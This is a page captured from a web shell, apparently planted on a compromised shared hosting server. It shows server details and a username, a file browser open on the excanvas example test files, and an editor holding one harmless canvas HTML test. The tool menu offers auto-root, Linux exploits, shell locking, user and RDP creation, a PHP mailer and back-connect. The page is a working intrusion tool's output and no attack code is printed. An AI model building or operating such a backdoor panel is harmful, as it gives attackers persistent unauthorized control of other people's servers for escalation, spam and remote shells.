Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libjs-excanvas /
examples /
testcases /
[ HOME SHELL ]
Name
Size
Permission
Action
arc.html
883
B
-rw-r--r--
clearpath.html
942
B
-rw-r--r--
drawimage.html
574
B
-rw-r--r--
gradient.html
810
B
-rw-r--r--
gradient2.html
874
B
-rw-r--r--
linewidth.html
887
B
-rw-r--r--
overflow.html
687
B
-rw-r--r--
quadraticcurve.html
1.03
KB
-rw-r--r--
resizing.html
1.52
KB
-rw-r--r--
saverestorepath.html
858
B
-rw-r--r--
stroke-scale-rotate.html
1.3
KB
-rw-r--r--
stroke-should-not-close-path.h...
629
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stroke-should-not-close-path.html
<!DOCTYPE html> <html> <head> <title></title> <style> body { text-align: center } </style> <!--[if IE]><script type="text/javascript" src="../excanvas.js"></script><![endif]--> <script> window.onload = function() { var canvas = document.getElementById("c"); var ctx = canvas.getContext("2d"); ctx.fillStyle = "#ccc"; ctx.strokeStyle = "#000"; ctx.beginPath(); ctx.moveTo(30, 30); ctx.lineTo(150, 150); ctx.bezierCurveTo(60, 70, 60, 70, 70, 150); ctx.fill(); ctx.stroke(); }; </script> </head> <body> <canvas id=c width=200 height=200></canvas> </body> </html>
Close